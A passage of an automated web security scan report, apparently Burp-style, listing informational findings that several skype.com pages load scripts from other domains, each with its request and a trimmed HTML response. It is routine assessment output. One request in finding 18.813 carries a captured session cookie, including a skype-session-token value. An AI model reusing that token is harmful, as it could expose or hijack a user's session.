Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54583


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.806. http://www.skype.com/intl/en-us/prices/skype-credit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/skype-credit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/skype-credit HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.807. http://www.skype.com/intl/en-us/prices/skype-credit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/skype-credit/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/skype-credit/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.808. http://www.skype.com/intl/en-us/prices/sms-rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/sms-rates

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/sms-rates HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 119079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.809. http://www.skype.com/intl/en-us/prices/sms-rates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/sms-rates/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/sms-rates/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 119079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.810. http://www.skype.com/intl/en-us/prices/ways-to-pay/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/ways-to-pay/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/ways-to-pay/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.811. http://www.skype.com/intl/en-us/special-offers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/special-offers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/special-offers HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52087


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Special offers on Skype Credit and accessories - Skype</title>
   <meta name="description"
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>


           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.812. http://www.skype.com/intl/en-us/special-offers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/special-offers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/special-offers/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52087


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Special offers on Skype Credit and accessories - Skype</title>
   <meta name="description"
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>


           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.813. http://www.skype.com/intl/en-us/tell-a-friend/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/tell-a-friend/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/tell-a-friend/?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:39 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 46965
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title
...[SNIP]...
<!-- Default javascripts -->
<script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>


<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/formvalidate.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://www.skypeassets.com/i/js/share.js"></script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/jsvalidate/jsvalidate.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.814. http://www.skype.com/intl/en-us/tell-a-friend/preview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/tell-a-friend/preview/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/tell-a-friend/preview/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:07 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>Pr
...[SNIP]...
<!-- Default javascripts -->
<script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>


<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/share.css" type="text/css" />
<script src="http://www.skypeassets.com/i/js/share.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.815. http://www.skype.com/intl/en-us/tell-a-friend/shared/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/tell-a-friend/shared/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/tell-a-friend/shared/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 39908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.816. http://www.skype.com/intl/en/business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 77079


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Business - Transform the way your business works with Skype</title>
   <meta name="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.817. http://www.skype.com/intl/en/business-user-guide/pc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business-user-guide/pc/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business-user-guide/pc/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:10 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 12878

<!DOCTYPE html>
<html lang="en" >
<head>
   <title>Using Skype for business</title>
   <meta name="description" content="" />
   <meta name="keywords" content="" />
   <!-- Meta -->
   <meta http-equiv="
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.818. http://www.skype.com/intl/en/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 77079


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Business - Transform the way your business works with Skype</title>
   <meta name="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.819. http://www.skype.com/intl/en/business/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/download

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/download HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:54 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56300


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download Skype for Windows ... Business Version (with MSI)</title>
   <meta name="description
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.820. http://www.skype.com/intl/en/business/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/download/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56300


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download Skype for Windows ... Business Version (with MSI)</title>
   <meta name="description
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.821. http://www.skype.com/intl/en/business/group-video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/group-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/group-video HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49848


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group video calling - host real-time video conferences on Skype</title>
   <meta name="descri
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.822. http://www.skype.com/intl/en/business/group-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/group-video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/group-video/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
